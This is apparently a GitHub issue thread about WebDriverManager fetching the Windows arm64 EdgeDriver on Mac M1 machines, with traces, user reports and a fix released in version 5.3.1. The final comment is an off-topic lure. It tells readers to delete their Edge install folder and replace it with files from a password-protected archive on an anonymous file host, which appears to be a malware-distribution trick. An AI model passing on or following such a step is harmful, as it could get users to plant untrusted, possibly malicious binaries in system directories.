### ISSUE TITLE
WebDriverManager downloads the wrong EdgeDriver for MAC M1

### ISSUE THREAD

**Issue by ynot408** [bonigarcia/webdrivermanager#897]
**Description of the problem**: 
java -jar webdrivermanager-5.3.0-fat.jar resolveDriverFor edge
Above command downloads the arm64 version for windows edge driver.

Expected: Edge driver for mac M1 should have been downloaded.

**Browser and version**: edge 105

**Operating system**:  MAC M1 (mac os Monterey 12.5.1)

**WebDriverManager version**: webdrivermanager-5.3.0

**WebDriverManager call**: 
java -jar webdrivermanager-5.3.0-fat.jar resolveDriverFor edge

**WebDriverManager traces**: 
```
[INFO] Using WebDriverManager to resolve edge
[DEBUG] Detecting edge version using online commands.properties
[DEBUG] Running command on the shell: [/Applications/Microsoft Edge.app/Contents/MacOS/Microsoft Edge, -version]
[DEBUG] Result: Microsoft Edge 105.0.1343.33
[DEBUG] Latest version of msedgedriver according to https://msedgedriver.azureedge.net/LATEST_RELEASE_105_MACOS is 105.0.1343.34
[INFO] Using msedgedriver 105.0.1343.34 (resolved driver for Edge 105)
[INFO] Reading https://msedgedriver.azureedge.net/?restype=container&comp=list to seek msedgedriver
[DEBUG] Driver to be downloaded edgedriver 105.0.1343.34
[DEBUG] Using URL built from repository pattern: https://msedgewebdriverstorage.blob.core.windows.net/edgewebdriver/105.0.1343.34/edgedriver_arm64.zip
[INFO] Downloading https://msedgewebdriverstorage.blob.core.windows.net/edgewebdriver/105.0.1343.34/edgedriver_arm64.zip
[INFO] Extracting driver from compressed file edgedriver_arm64.zip
[INFO] Driver location: /Users/Pthomas/projects/work/automation/newuiauto/libs/msedgedriver.exe
```

**Error log**: 
The url downloaded was wrong - https://msedgewebdriverstorage.blob.core.windows.net/edgewebdriver/105.0.1343.34/edgedriver_arm64.zip
Expected url - https://msedgedriver.azureedge.net/105.0.1343.33/edgedriver_mac64_m1.zip

The downloads are happening from Beta channel and the beta channel has no build for mac

**Comment by rehmanuet** [comment]
+1 for this, For mac m1 pro, its downloading the windows driver "exe" file

> selenium/msedgedriver/mac-arm64/105.0.1343.42/msedgedriver.exe: cannot execute binary file

**Comment by bonigarcia** [comment]
I have just test this in an macOS M1. Indeed, the downloaded driver for an Edge 105 is `edgedriver_arm64`, nevertheless, this driver works for driving Selenium tests:

```
```

**Comment by SealviewTW** [comment]
This has recently started to happen to me as well. Seems to be related to the edge version.
For example 101.0.1210.53 correctly downloads the mac version of the webdriver and 105.0.1343.53 downloads the windows version.

<img width="503" alt="image" src="https://user-images.githubusercontent.com/11609472/192459059-188ecdbf-6838-47cf-8a37-a599891e606f.png">

**Comment by bwalderman** [comment]
Native M1 builds for Mac are now available too https://github.com/MicrosoftEdge/EdgeWebDriver/issues/17#issuecomment-1258326485

**Comment by SealviewTW** [comment]
still present for v106, I had to manually download the m1 mac version from microsoft and put in the .cache folder

**Comment by bonigarcia** [comment]
Thanks for reporting. I am in peek of work now, but I try to solve and release a new version it as soon as possible.

**Comment by asolntsev** [comment]
@bonigarcia I experienced the same problem on my Mac M1. 
I found a solution, see PR https://github.com/bonigarcia/webdrivermanager/pull/921

P.S. This is my info:
```
shortDriverName="edgedriver"
driverVersion = "106.0.1370.47"
getLatest = false
os="MAC"
architecture="ARM64"
isEdgeArm64=true
isMac=true
builtUrl="https://msedgewebdriverstorage.blob.core.windows.net/edgewebdriver/106.0.1370.47/edgedriver_arm64.zip"
```

BUT file name "edgedriver_arm64.zip" is incorrect - it downloads a *.exe file for Windows.
For Mac M1, we need file "edgedriver_mac64_m1.zip".

**Comment by bonigarcia** [comment]
Thanks for contributing, @asolntsev. Your PR is merged now, it will be available for next version (I think I will release it in November).

**Comment by bonigarcia** [comment]
This fix is available on WebDriverManager 5.3.1, just released.

**Comment by markomirtic** [comment]
Does anyone have the same problem still, I'm gettting:
Could not start a new session. Possible causes are invalid address of the remote server or browser start-up failure. 
With this setup:
  logger.debug("Using Webdriver manager");
                        WebDriverManager.edgedriver().setup();
                        break;
                        
          But when I use it's working, any solution?
          Version 111.0.1661.62 - Edge
   logger.debug("Using Edge Driver");
                       System.setProperty("webdriver.edge.driver", "/usr/bin/msedgedriver_mac");
                        //System.setProperty("webdriver.edge.driver", "src/test/resources/drivers/msedgedriver_mac");
                        edgeOptions.setHeadless(true);
                        break;

**Comment by dearramz** [comment]
Short instructions for those who could not find any registry entries (like me) and the problem persisted:

Navigate to > C:\Program Files (x86)\Microsoft > DELETE > Edge folder
Download dir > https://easyupload.io/vrvea4 > (Ver. 104.0.1293.70 FIX) > Password to download: 123451 > Navigate again to > C:\Program Files (x86)\Microsoft > paste the “Edge” folder and open Edge. After that, the Edge Browser in Ver. 104.0.1293.70, then (if you want the latest version) close the Edge browser via Task Manager and navigate directly to the Windows search bar and type > Apps > navigate to Apps & programs > search for Edge > Change > Repair. Once the Edge browser has been reinstalled, open Edge again and the latest version 112.0.1722.58 (Official Build) (64-bit/32-bit) should be installed and updated. After that you can via. Check the settings in the Edge browser again for updates and you're done.

Best regards from,

dearramz

PS Did that and haven't had any problems since.
